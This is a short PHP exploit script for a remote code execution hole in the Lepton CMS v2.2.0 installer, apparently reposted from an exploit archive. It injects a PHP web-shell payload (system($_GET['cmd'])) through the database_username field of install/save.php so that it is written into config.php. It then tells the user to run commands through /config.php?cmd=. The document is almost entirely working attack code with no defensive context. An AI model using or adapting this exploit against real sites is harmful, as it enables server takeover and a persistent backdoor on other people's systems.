<?php

/*
Lepton CMS v2.2.0 - Remote Code Execution.
Author: Hyp3rLinx
Exploit Author: ~
*/

$target = "http://127.0.0.1/lepton/install/save.php";
$payload = "');?><?php echo '<pre>'; system(\$_GET['cmd']); die();?>";

function curl_post($url, $post_data) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_POST, 15);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1");
        $output = curl_exec($ch);
        $info = curl_getinfo($ch);
        curl_close($ch);
        return $info;
}

$da = curl_post($target, "guid=E610A7F2-5E4A-4571-9391-C947152FDFB0&website_title=abc&lepton_url=a&default_timezone_string=Europe/London&default_language=EN&operating_system=linux&database_host=127.0.0.1&database_username=$payload&database_password=abc&database_name=test&table_prefix=abc_&admin_username=admin&[email protected]&admin_password=admin&admin_repassword=admin");
if($da['http_code'] == 200) {
        echo "\nTada: Now visit /config.php?cmd= on target.\n";
}

?>

# siph0n [2016-08-25]